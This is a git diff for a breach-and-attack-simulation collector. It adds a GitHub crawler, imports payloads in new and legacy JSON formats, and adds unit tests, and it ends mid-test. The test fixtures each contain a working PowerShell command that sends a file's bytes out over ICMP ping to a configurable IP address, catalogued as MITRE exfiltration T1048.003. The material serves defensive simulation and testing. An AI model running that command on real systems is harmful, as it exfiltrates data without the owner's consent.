diff --git a/openaev/openaev/github_crawler.py b/openaev/openaev/github_crawler.py new file mode 100644 index 00000000..5dd8a9d1 --- /dev/null +++ b/openaev/openaev/github_crawler.py @@ -0,0 +1,58 @@ +from urllib.parse import quote, urlparse + +import orjson +import requests +from github import Github + + +def extract_from_url_prefix(url_prefix): + """convert the previously used url_prefix format to the new repo and ref format""" + parsed_url = urlparse(url_prefix) + path = parsed_url.path + repo, ref = path.rstrip("/").lstrip("/").split("/refs/") + return repo, ref + + +class GithubCrawler: + def __init__(self, repo_name: str, ref_value: str) -> None: + self.repo_name = repo_name + self.ref_value = ref_value + + self.github_client = Github() + self.repo = self.github_client.get_repo(self.repo_name) + self.ref = self.repo.get_git_ref(self.ref_value) + + def get_json_file_paths(self) -> list: + tree_url = self.repo.trees_url + tree_url = tree_url.replace("{/sha}", f"/{self.ref.object.sha}") + tree_url += "?recursive=true" + + tree_data = requests.get(tree_url).json()["tree"] + + json_file_paths = [ + element["path"] + for element in tree_data + if element["path"].endswith(".json") + and element["path"] != "manifest.json" + and not element["path"].startswith(".") + ] + return json_file_paths + + def get_json(self, json_file_path: str) -> dict: + content = self.repo.get_contents(json_file_path) + data = content.decoded_content + data = orjson.loads(data) + return data + + def get_filepath_if_exists(self, folderpath: str, filename: str) -> str | None: + """check if a specific file exists in a specific folder""" + filepath = f"{folderpath.rstrip('/')}/{filename.lstrip('/')}" + if filepath in [el.path for el in self.repo.get_contents(folderpath)]: + return filepath + return + + def gen_raw_download_url(self, path: str) -> str: + """return the raw download URL for a specific path""" + path = quote(path) + url = f"https://raw.githubusercontent.com/{self.repo_name}/{self.ref_value}/{path}" + return url diff --git a/openaev/openaev/openaev_openaev.py b/openaev/openaev/openaev_openaev.py index 1a12b1e3..860ef74a 100644 --- a/openaev/openaev/openaev_openaev.py +++ b/openaev/openaev/openaev_openaev.py @@ -2,26 +2,33 @@ import mimetypes import zipfile +import json_api_doc import requests from pyoaev.configuration import Configuration from pyoaev.daemons import CollectorDaemon from openaev.configuration.config_loader import ConfigLoader +from openaev.github_crawler import GithubCrawler, extract_from_url_prefix class OpenAEVOpenAEV(CollectorDaemon): def __init__( self, configuration: Configuration, - ): + ) -> None: super().__init__( configuration=configuration, callback=self._process_message, collector_type="openaev_openaev", ) self.session = requests.Session() + self.openaev_url_prefix = self._configuration.get("openaev_url_prefix") + repo_name, ref_value = extract_from_url_prefix(self.openaev_url_prefix) + self.github_crawler = GithubCrawler(repo_name, ref_value) - def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): + self.current_payload_path = None + + def _create_or_get_tag(self, tag_name: str, tag_color: str = "#6b7280"): """Create or get a tag and return its ID.""" try: tag_data = {"tag_name": tag_name, "tag_color": tag_color} @@ -31,115 +38,269 @@ def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): self.logger.warning(f"Failed to upsert tag {tag_name}: {e}") return None - def _process_message(self) -> None: - openaev_import_only_native = self._configuration.get( - "openaev_import_only_native" - ) - openaev_url_prefix = self._configuration.get("openaev_url_prefix") - response = self.session.get(url=openaev_url_prefix + "manifest.json") - payloads = response.json() - payload_external_ids = [] + def _process_payload_tags(self, payload: dict): + tags_mapping = {} + payload_tags = payload.get("payload_tags", []) + for tag in payload_tags: + tag = { + key: value + for key, value in tag.items() + if key in ["tag_id", "tag_name", "tag_color"] + } + new_tag = self.api.tag.upsert(tag) + tags_mapping[tag["tag_id"]] = new_tag["tag_id"] + + new_tags = [ + tags_mapping[tag["tag_id"]] + for tag in payload_tags + if tag["tag_id"] in tags_mapping + ] + + # Add collector source tag + source_tag_name = "source:openaev-datasets" + source_tag_id = self._create_or_get_tag(source_tag_name, "#ef4444") # Red + if source_tag_id and source_tag_id not in new_tags: + new_tags.append(source_tag_id) + + # Add native/community tag if applicable + if payload.get("native_collection", False): + native_tag_name = "type:native" + native_tag_id = self._create_or_get_tag(native_tag_name, "#10b981") # Green + if native_tag_id and native_tag_id not in new_tags: + new_tags.append(native_tag_id) + + return tags_mapping, new_tags + + def _process_payload_attack_patterns(self, payload: dict) -> list: + attack_patterns = payload.get("payload_attack_patterns", []) + + for idx in range(len(attack_patterns)): + if "id" in attack_patterns[idx]: + del attack_patterns[idx]["id"] + if "type" in attack_patterns[idx]: + del attack_patterns[idx]["type"] + + if len(attack_patterns) > 0: + self.api.attack_pattern.upsert(attack_patterns, True) + + attack_patterns = [ + attack["attack_pattern_external_id"] for attack in attack_patterns + ] + return attack_patterns - for payload in payloads: + def _process_document(self, payload: dict, document_key: str, tags_mapping: dict): + payload_document = payload.get(document_key, {}) - # Only native, continue - if openaev_import_only_native and ( - "native_collection" not in payload or not payload["native_collection"] + if "id" in payload_document: + del payload_document["id"] + if "type" in payload_document: + del payload_document["type"] + if payload_document.get("document_tags", []): + if payload_document["document_tags"] and isinstance( + payload_document["document_tags"][0], dict ): - continue - - payload_information = payload.get("payload_information") - self.logger.info("Importing payload " + payload_information["payload_name"]) - - # Create tags - tags_mapping = {} - tags = payload.get("payload_tags", []) - for tag in tags: - new_tag = self.api.tag.upsert(tag) - tags_mapping[tag["tag_id"]] = new_tag["tag_id"] - - # Create attack patterns - attack_patterns = payload.get("payload_attack_patterns", []) - if len(attack_patterns) > 0: - self.api.attack_pattern.upsert(attack_patterns, True) - - # Create document - new_document = None - document = payload.get("payload_document", None) - if document is not None and "document_path" in document: - # Upload the document - new_tags = [] - for tag_id in document.get("document_tags", []): - if tag_id in tags_mapping: - new_tags.append(tags_mapping[tag_id]) - document["document_tags"] = new_tags - - zip_url = openaev_url_prefix + document["document_path"] - zip_response = self.session.get(zip_url) - zip_response.raise_for_status() - with io.BytesIO(zip_response.content) as zip_buffer: - with zipfile.ZipFile(zip_buffer) as z: - file_names = z.namelist() - if not file_names: - raise Exception(f"No file found in zip at {zip_url}") - file_name = file_names[0] - with z.open(file_name, pwd=b"infected") as unzipped_file: - file_content = unzipped_file.read() - mime_type, _ = mimetypes.guess_type( - document["document_name"] - ) - if mime_type is None: - mime_type = "application/octet-stream" - file_handle = io.BytesIO(file_content) - file = (document["document_name"], file_handle, mime_type) - new_document = self.api.document.upsert( - document=document, file=file - ) - - # Upsert payload - payload_information["payload_collector"] = self._configuration.get( - "collector_id" + payload_document["document_tags"] = [ + tag["tag_id"] for tag in payload_document.get("document_tags", []) + ] + + if not payload_document.get("document_path", "") and payload_document.get( + "document_target" + ): + folderpath = self.current_payload_path.rsplit("/", 1)[0] + filename = payload_document.get("document_target") + filepath = self.github_crawler.get_filepath_if_exists(folderpath, filename) + if filepath: + payload_document["document_path"] = filepath + else: + self.logger.warning( + f"Failed to find document {filename} for payload {self.current_payload_path}" + ) + + if not payload_document.get("document_name", "") and payload_document.get( + "document_target" + ): + payload_document["document_name"] = payload_document["document_target"] + + if not payload_document.get("document_path", ""): + return payload_document, None + + # Upload the document + payload_document["document_tags"] = [ + tags_mapping[tag_id] + for tag_id in payload_document.get("document_tags", []) + if tag_id in tags_mapping + ] + + url = self.github_crawler.gen_raw_download_url( + payload_document["document_path"] + ) + if payload_document["document_path"].endswith(".zip"): + target = payload_document["document_target"] + zip_response = self.session.get(url) + zip_response.raise_for_status() + with io.BytesIO(zip_response.content) as zip_buffer: + with zipfile.ZipFile(zip_buffer) as z: + if not target in z.namelist(): + raise Exception(f"No {target} file found in zip at {url}") + with z.open(target, pwd=b"infected") as unzipped_file: + file_content = unzipped_file.read() + else: + file_response = self.session.get(url) + file_response.raise_for_status() + file_content = file_response.content + + mime_type, _ = mimetypes.guess_type(payload_document["document_name"]) + mime_type = mime_type or "application/octet_stream" + with io.BytesIO(file_content) as file_handle: + file = ( + payload_document["document_name"], + file_handle, + mime_type, + ) + new_document = self.api.document.upsert( + document=payload_document, file=file ) - new_tags = [] - for tag_id in payload_information.get("payload_tags", []): - if tag_id in tags_mapping: - new_tags.append(tags_mapping[tag_id]) - - # Add collector source tag - source_tag_name = "source:openaev-datasets" - source_tag_id = self._create_or_get_tag(source_tag_name, "#ef4444") # Red - if source_tag_id: - new_tags.append(source_tag_id) - - # Add native/community tag if applicable - if payload.get("native_collection", False): - native_tag_name = "type:native" - native_tag_id = self._create_or_get_tag( - native_tag_name, "#10b981" - ) # Green - if native_tag_id: - new_tags.append(native_tag_id) - - payload_information["payload_tags"] = new_tags - - new_attack_patterns = [] - for attack_pattern in payload_information.get( - "payload_attack_patterns", [] - ): - new_attack_patterns.append(attack_pattern["attack_pattern_external_id"]) - payload_information["payload_attack_patterns"] = new_attack_patterns - - if "executable_file" in payload_information and new_document is not None: - payload_information["executable_file"] = new_document["document_id"] - elif "file_drop_file" in payload_information and new_document is not None: - payload_information["file_drop_file"] = new_document["document_id"] - - self.api.payload.upsert(payload_information) - payload_external_ids.append(payload_information["payload_external_id"]) - self.logger.info( - "Payload " + payload_information["payload_name"] + " imported" + return payload_document, new_document + + def _is_valid_json_api(self, payload: dict) -> bool: + """check if the JSON data is in the JSON:API format""" + return "data" in payload.keys() + + def _is_valid_json_flat(self, payload: dict) -> bool: + """check if the JSON data is in the legacy flat JSON payload format""" + return "payload_information" in payload.keys() + + def _process_jsonapi_payload(self, payload: dict) -> dict: + """processing a single JSON:API payload""" + flat_payload = json_api_doc.deserialize(payload) + self.logger.info("Importing payload " + flat_payload["payload_name"]) + + # Create tags + tags_mapping, new_tags = self._process_payload_tags(flat_payload) + flat_payload["payload_tags"] = new_tags + + # Create attack patterns + payload_attack_patterns = self._process_payload_attack_patterns(flat_payload) + flat_payload["payload_attack_patterns"] = payload_attack_patterns + + # Create document + file_key = "payload_document" + file_lookup = [ + key + for key in flat_payload + if isinstance(flat_payload[key], dict) + and flat_payload[key].get("type") == "documents" + ] + if len(file_lookup) > 1: + self.logger.warning( + "Warning, more than one file detected as attachment, fallback to first found" ) + if file_lookup: + file_key = file_lookup[0] + + payload_document, new_document = self._process_document( + flat_payload, file_key, tags_mapping + ) + + if file_lookup: + del flat_payload[file_key] + flat_payload["payload_document"] = payload_document + + for key in ["executable_file", "file_drop_file"]: + if key in flat_payload and new_document is not None: + flat_payload[key] = new_document["document_id"] + + # align flat JSON:API with legacy flat JSON (domains) + flat_payload["payload_domains"] = [ + { + "domain_name": domain["domain_name"], + "domain_color": domain["domain_color"], + } + for domain in flat_payload.get("payload_domains", []) + ] + + # align flat JSON:API with legacy flat JSON (external ID) + if ( + "payload_external_id" not in flat_payload + or flat_payload["payload_external_id"] is None + ): + flat_payload["payload_external_id"] = flat_payload["payload_id"] + + # align flat JSON:API with legacy flat JSON (leftovers) + for key in [ + "id", + "type", + "payload_id", + "payload_collector", + "payload_collector_type", + ]: + if key in flat_payload: + del flat_payload[key] + + return flat_payload + + def _process_jsonflat_payload(self, payload: dict) -> dict: + """processing a single legacy flat JSON payload""" + payload_information = payload.get("payload_information") + self.logger.info("Importing payload " + payload_information["payload_name"]) + + # Create tags + tags_mapping, new_tags = self._process_payload_tags(payload) + payload_information["payload_tags"] = new_tags + + # Create attack patterns + payload_attack_patterns = self._process_payload_attack_patterns(payload) + payload_information["payload_attack_patterns"] = payload_attack_patterns + + # Create document + file_key = "payload_document" + payload_document, new_document = self._process_document( + payload, file_key, tags_mapping + ) + + for key in ["executable_file", "file_drop_file"]: + if key in payload_information and new_document is not None: + payload_information[key] = new_document["document_id"] + + return payload_information + + def _process_single_payload(self) -> str | None: + payload = self.github_crawler.get_json(self.current_payload_path) + + openaev_import_only_native = self._configuration.get( + "openaev_import_only_native" + ) + if openaev_import_only_native and ( + "native_collection" not in payload or not payload["native_collection"] + ): + return + + if self._is_valid_json_api(payload): # new format + payload = self._process_jsonapi_payload(payload) + elif self._is_valid_json_flat(payload): # legacy format + payload = self._process_jsonflat_payload(payload) + else: + self.logger.warning( + f"Skipping a payload that didn't match JSON:API format nor flat legacy format: {self.current_payload_path}" + ) + return + + payload["payload_collector"] = self._configuration.get("collector_id") + self.api.payload.upsert(payload) + self.logger.info(f"Payload {payload["payload_name"]} imported") + + return payload["payload_external_id"] + + def _process_message(self) -> None: + payload_external_ids = [] + payloads = self.github_crawler.get_json_file_paths() + + for payload_path in payloads: + self.current_payload_path = payload_path + payload_external_id = self._process_single_payload() + if payload_external_id: + payload_external_ids.append(payload_external_id) self.api.payload.deprecate( { diff --git a/openaev/pyproject.toml b/openaev/pyproject.toml index e979cf00..92a3372d 100644 --- a/openaev/pyproject.toml +++ b/openaev/pyproject.toml @@ -15,6 +15,13 @@ pyoaev = [ { markers = "extra == 'prod' and extra != 'dev'", version = "2.260525.0", source = "pypi" }, { markers = "extra == 'dev' and extra != 'prod'", path = "../../client-python", develop = true }, ] +json-api-doc = "^0.15.0" +pygithub = "^2.9.1" +requests = ">=2.33.0,<2.34.0" +orjson = "^3.11.9" + +[tool.poetry.group.dev.dependencies] +pytest = "^8.3.5" [tool.poetry.extras] prod = ["pyoaev"] @@ -27,4 +34,4 @@ build-backend = "poetry.core.masonry.api" [tool.cmw] install-command = "poetry install --extras prod" config-dump-command = "poetry run python -m openaev.openaev_openaev --dump-config-schema" -icon-path = "openaev/img/icon-openaev.png" \ No newline at end of file +icon-path = "openaev/img/icon-openaev.png" diff --git a/openaev/tests/functional/new_format.json b/openaev/tests/functional/new_format.json new file mode 100644 index 00000000..238e32fe --- /dev/null +++ b/openaev/tests/functional/new_format.json @@ -0,0 +1,180 @@ +{ + "data" : { + "id" : "9370b76d-c1de-48e8-9b0c-16414e300354", + "type" : "command", + "attributes" : { + "payload_type" : "Command", + "command_executor" : "psh", + "command_content" : "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "payload_id" : "9370b76d-c1de-48e8-9b0c-16414e300354", + "payload_name" : "Exfiltration Over Alternative Protocol - ICMP", + "payload_description" : "Exfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n", + "payload_platforms" : [ "Windows" ], + "payload_cleanup_executor" : null, + "payload_cleanup_command" : null, + "payload_elevation_required" : false, + "payload_arguments" : [ { + "type" : "text", + "key" : "input_file", + "default_value" : "C:\\Windows\\System32\\notepad.exe", + "description" : null, + "separator" : null + }, { + "type" : "text", + "key" : "ip_address", + "default_value" : "127.0.0.1", + "description" : null, + "separator" : null + } ], + "payload_prerequisites" : [ ], + "payload_external_id" : "16e5f26d-e92f-4a2f-8894-abbf29087153", + "payload_source" : "FILIGRAN", + "payload_expectations" : [ "PREVENTION", "DETECTION" ], + "payload_status" : "VERIFIED", + "payload_execution_arch" : "ALL_ARCHITECTURES", + "payload_created_at" : "2025-07-30T06:24:33.794113Z", + "payload_updated_at" : "2026-05-19T13:05:00.117600Z" + }, + "relationships" : { + "payload_attack_patterns" : { + "data" : [ { + "id" : "bbc76d1b-918d-4eb7-8a43-ee0c3133c0bb", + "type" : "attack_patterns" + } ] + }, + "payload_tags" : { + "data" : [ { + "id" : "690e69a9-d229-4a6d-a0cd-ead2747153aa", + "type" : "tags" + }, { + "id" : "13269285-08b1-423e-8ca2-1bc3553c9408", + "type" : "tags" + } ] + }, + "payload_domains" : { + "data" : [ { + "id" : "28567513-3d69-4411-a825-802beb8948cc", + "type" : "domains" + }, { + "id" : "0f9dd86d-3f23-4d6a-bfef-11d80fc9766c", + "type" : "domains" + }, { + "id" : "ff033435-8631-4c7b-9ed8-178b34011e65", + "type" : "domains" + } ] + } + } + }, + "included" : [ { + "id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "type" : "kill_chain_phases", + "attributes" : { + "phase_id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "phase_external_id" : "TA0010", + "phase_stix_id" : "x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462", + "phase_name" : "Exfiltration", + "phase_shortname" : "exfiltration", + "phase_kill_chain_name" : "mitre-attack", + "phase_description" : "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.", + "phase_order" : 12, + "phase_created_at" : "2025-07-22T13:40:49.929298Z", + "phase_updated_at" : "2025-07-22T13:40:49.929299Z" + } + }, { + "id" : "6e40d76d-6c21-4281-9704-f728866ff35c", + "type" : "attack_patterns", + "attributes" : { + "attack_pattern_id" : "6e40d76d-6c21-4281-9704-f728866ff35c", + "attack_pattern_stix_id" : "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "attack_pattern_name" : "Exfiltration Over Alternative Protocol", + "attack_pattern_description" : "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).", + "attack_pattern_external_id" : "T1048", + "attack_pattern_platforms" : [ "ESXi", "IaaS", "Linux", "macOS", "Network Devices", "Office Suite", "SaaS", "Windows" ], + "attack_pattern_permissions_required" : [ ], + "attack_pattern_created_at" : "2025-07-22T13:40:50.760141Z", + "attack_pattern_updated_at" : "2026-04-28T08:40:48.980402Z" + }, + "relationships" : { + "attack_pattern_kill_chain_phases" : { + "data" : [ { + "id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "type" : "kill_chain_phases" + } ] + } + } + }, { + "id" : "bbc76d1b-918d-4eb7-8a43-ee0c3133c0bb", + "type" : "attack_patterns", + "attributes" : { + "attack_pattern_id" : "bbc76d1b-918d-4eb7-8a43-ee0c3133c0bb", + "attack_pattern_stix_id" : "attack-pattern--be72481a-b46e-48da-8c33-2cdd510d38e3", + "attack_pattern_name" : "Exfiltration Over Unencrypted Non-C2 Protocol", + "attack_pattern_description" : "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "attack_pattern_external_id" : "T1048.003", + "attack_pattern_platforms" : [ ], + "attack_pattern_permissions_required" : [ ], + "attack_pattern_created_at" : "2025-07-22T13:40:55.153454Z", + "attack_pattern_updated_at" : "2026-05-19T13:05:00.076338Z" + }, + "relationships" : { + "attack_pattern_parent" : { + "data" : { + "id" : "6e40d76d-6c21-4281-9704-f728866ff35c", + "type" : "attack_patterns" + } + }, + "attack_pattern_kill_chain_phases" : { + "data" : [ { + "id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "type" : "kill_chain_phases" + } ] + } + } + }, { + "id" : "690e69a9-d229-4a6d-a0cd-ead2747153aa", + "type" : "tags", + "attributes" : { + "tag_id" : "690e69a9-d229-4a6d-a0cd-ead2747153aa", + "tag_name" : "type:native", + "tag_color" : "#10b981" + } + }, { + "id" : "13269285-08b1-423e-8ca2-1bc3553c9408", + "type" : "tags", + "attributes" : { + "tag_id" : "13269285-08b1-423e-8ca2-1bc3553c9408", + "tag_name" : "source:openaev-datasets", + "tag_color" : "#ef4444" + } + }, { + "id" : "28567513-3d69-4411-a825-802beb8948cc", + "type" : "domains", + "attributes" : { + "domain_id" : "28567513-3d69-4411-a825-802beb8948cc", + "domain_name" : "Data Exfiltration", + "domain_color" : "#9933CC", + "domain_created_at" : "2026-02-06T08:50:48.372475Z", + "domain_updated_at" : "2026-02-06T08:50:48.372475Z" + } + }, { + "id" : "0f9dd86d-3f23-4d6a-bfef-11d80fc9766c", + "type" : "domains", + "attributes" : { + "domain_id" : "0f9dd86d-3f23-4d6a-bfef-11d80fc9766c", + "domain_name" : "Endpoint", + "domain_color" : "#389CFF", + "domain_created_at" : "2026-02-06T08:50:48.372475Z", + "domain_updated_at" : "2026-02-06T08:50:48.372475Z" + } + }, { + "id" : "ff033435-8631-4c7b-9ed8-178b34011e65", + "type" : "domains", + "attributes" : { + "domain_id" : "ff033435-8631-4c7b-9ed8-178b34011e65", + "domain_name" : "Network", + "domain_color" : "#009933", + "domain_created_at" : "2026-02-06T08:50:48.372475Z", + "domain_updated_at" : "2026-02-06T08:50:48.372475Z" + } + } ] +} \ No newline at end of file diff --git a/openaev/tests/functional/old_format.json b/openaev/tests/functional/old_format.json new file mode 100644 index 00000000..9934cf6e --- /dev/null +++ b/openaev/tests/functional/old_format.json @@ -0,0 +1,81 @@ +{ + "export_version": 1, + "native_collection": true, + "payload_information": { + "payload_type": "Command", + "payload_name": "Exfiltration Over Alternative Protocol - ICMP", + "payload_description": "Exfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n", + "payload_platforms": [ + "Windows" + ], + "payload_attack_patterns": [ + { + "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7", + "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "attack_pattern_external_id": "T1048.003", + "attack_pattern_kill_chain_phases": null + } + ], + "payload_cleanup_executor": null, + "payload_cleanup_command": null, + "payload_elevation_required": false, + "payload_arguments": [ + { + "type": "text", + "key": "input_file", + "default_value": "C:\\Windows\\System32\\notepad.exe", + "description": null, + "separator": null + }, + { + "type": "text", + "key": "ip_address", + "default_value": "127.0.0.1", + "description": null, + "separator": null + } + ], + "payload_prerequisites": [], + "payload_external_id": "16e5f26d-e92f-4a2f-8894-abbf29087153", + "payload_source": "FILIGRAN", + "payload_expectations": [ + "PREVENTION", + "DETECTION" + ], + "payload_status": "VERIFIED", + "payload_execution_arch": "ALL_ARCHITECTURES", + "payload_detection_remediations": [], + "payload_tags": [], + "payload_output_parsers": [], + "payload_created_at": "2025-06-20T09:48:40.920388Z", + "payload_updated_at": "2025-07-30T05:22:43.528118Z", + "command_executor": "psh", + "command_content": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "payload_domains": [ + { + "domain_name": "Endpoint", + "domain_color": "#389CFF" + }, + { + "domain_name": "Data Exfiltration", + "domain_color": "#9933CC" + }, + { + "domain_name": "Network", + "domain_color": "#009933" + } + ] + }, + "payload_tags": [], + "payload_attack_patterns": [ + { + "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7", + "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "attack_pattern_external_id": "T1048.003", + "attack_pattern_kill_chain_phases": null + } + ], + "payload_arguments_documents": [] +} \ No newline at end of file diff --git a/openaev/tests/functional/test_payload_processing.py b/openaev/tests/functional/test_payload_processing.py new file mode 100644 index 00000000..d5c8645f --- /dev/null +++ b/openaev/tests/functional/test_payload_processing.py @@ -0,0 +1,128 @@ +import unittest +from pathlib import Path +from unittest.mock import MagicMock + +import orjson + +import openaev.openaev_openaev as module + +daemon_config_data = { + "openaev_url": "http://fake.url", + "openaev_token": "my_awesome_token", + "openaev_url_prefix": "https://raw.githubusercontent.com/OpenAEV-Platform/payloads/refs/heads/main/", + "collector_id": "collector-id", +} +old_format_path = Path("./tests/functional/old_format.json") +new_format_path = Path("./tests/functional/new_format.json") + + +def fake_upsert_tag(data): + return {"tag_id": f"id-{data.get('tag_name')}"} + + +class TestProcessingFunctions(unittest.TestCase): + def test_compare_process_results(self): + _configuration = daemon_config_data + api = MagicMock() + api.tag.upsert.side_effect = fake_upsert_tag + session = MagicMock() + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + collector.session = session + + old_payload = orjson.loads(old_format_path.read_bytes()) + new_payload = orjson.loads(new_format_path.read_bytes()) + + old_payload_processed = collector._process_jsonflat_payload(old_payload) + new_payload_processed = collector._process_jsonapi_payload(new_payload) + + self.assertTrue( + all( + key in new_payload_processed + for key in old_payload_processed + if old_payload_processed[key] + ) + ) + self.assertTrue( + all( + key in old_payload_processed + for key in new_payload_processed + if new_payload_processed[key] + ) + ) + + self.assertTrue( + all( + type(old_payload_processed[key]) == type(new_payload_processed[key]) + for key in old_payload_processed + if old_payload_processed[key] + ) + ) + self.assertTrue( + all( + type(old_payload_processed[key]) == type(new_payload_processed[key]) + for key in new_payload_processed + if new_payload_processed[key] + ) + ) + + exclusion_list = ["payload_created_at", "payload_updated_at"] + for key in old_payload_processed: + if old_payload_processed[key] and key not in exclusion_list: + if isinstance(old_payload_processed[key], dict): + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) + elif isinstance(old_payload_processed[key], list): + try: + self.assertEqual( + sorted(old_payload_processed[key]), + sorted(new_payload_processed[key]), + ) + except TypeError: + self.assertTrue( + all( + element in new_payload_processed[key] + for element in old_payload_processed[key] + ) + ) + self.assertTrue( + all( + element in old_payload_processed[key] + for element in new_payload_processed[key] + ) + ) + else: + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) + for key in new_payload_processed: + if new_payload_processed[key] and key not in exclusion_list: + if isinstance(new_payload_processed[key], dict): + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) + elif isinstance(new_payload_processed[key], list): + try: + self.assertEqual( + sorted(old_payload_processed[key]), + sorted(new_payload_processed[key]), + ) + except TypeError: + self.assertTrue( + all( + element in new_payload_processed[key] + for element in old_payload_processed[key] + ) + ) + self.assertTrue( + all( + element in old_payload_processed[key] + for element in new_payload_processed[key] + ) + ) + else: + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) diff --git a/openaev/tests/unit/test_github_crawler.py b/openaev/tests/unit/test_github_crawler.py new file mode 100644 index 00000000..942a72be --- /dev/null +++ b/openaev/tests/unit/test_github_crawler.py @@ -0,0 +1,122 @@ +import unittest +from unittest.mock import MagicMock, patch, sentinel + +import openaev.github_crawler as module + + +def test_extract_from_url_prefix(): + default_url_prefix = ( + "https://raw.githubusercontent.com/OpenAEV-Platform/payloads/refs/heads/main/" + ) + + repo, ref = module.extract_from_url_prefix(default_url_prefix) + + assert repo == "OpenAEV-Platform/payloads" + assert ref == "heads/main" + + +@patch.object(module, "Github") +class TestGithubCrawler(unittest.TestCase): + def test_github_crawler_init(self, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + + crawler = module.GithubCrawler(repo_name, ref_value) + + self.assertEqual(crawler.repo_name, sentinel.repo_name) + self.assertEqual(crawler.ref_value, sentinel.ref_value) + self.assertEqual(crawler.github_client, m_github.return_value) + self.assertEqual(crawler.repo, m_github.return_value.get_repo.return_value) + self.assertEqual( + crawler.ref, + m_github.return_value.get_repo.return_value.get_git_ref.return_value, + ) + m_github.return_value.get_repo.assert_called_with(sentinel.repo_name) + m_github.return_value.get_repo.return_value.get_git_ref.assert_called_with( + sentinel.ref_value + ) + + @patch.object(module, "requests") + def test_get_json_file_paths(self, m_requests, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + m_github.return_value.get_repo.return_value.trees_url = ( + "https://dead/beef{/sha}" + ) + m_github.return_value.get_repo.return_value.get_git_ref.return_value.object.sha = ( + "feedc0de" + ) + m_requests.get.return_value.json.return_value = { + "tree": [ + {"path": "manifest.json"}, + {"path": ".secrets/data.json"}, + {"path": "malware/malicious/evil/payload.json"}, + {"path": "malware/not-a-json.doc"}, + ] + } + + crawler = module.GithubCrawler(repo_name, ref_value) + + json_file_paths = crawler.get_json_file_paths() + + m_requests.get.assert_called_with("https://dead/beef/feedc0de?recursive=true") + self.assertEqual(json_file_paths, ["malware/malicious/evil/payload.json"]) + + @patch.object(module, "orjson") + def test_get_json(self, m_orjson, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + content = MagicMock() + m_github.return_value.get_repo.return_value.get_contents.return_value = content + + crawler = module.GithubCrawler(repo_name, ref_value) + + json_file_path = "malware/malicious/evil/payload.json" + + data = crawler.get_json(json_file_path) + + m_github.return_value.get_repo.return_value.get_contents.assert_called_with( + "malware/malicious/evil/payload.json" + ) + m_orjson.loads.assert_called_with(content.decoded_content) + self.assertEqual(data, m_orjson.loads.return_value) + + def test_get_filepath_if_exists(self, m_github): + repo_name = sentinel.repo_name + ref_value = sentinel.ref_value + content1 = 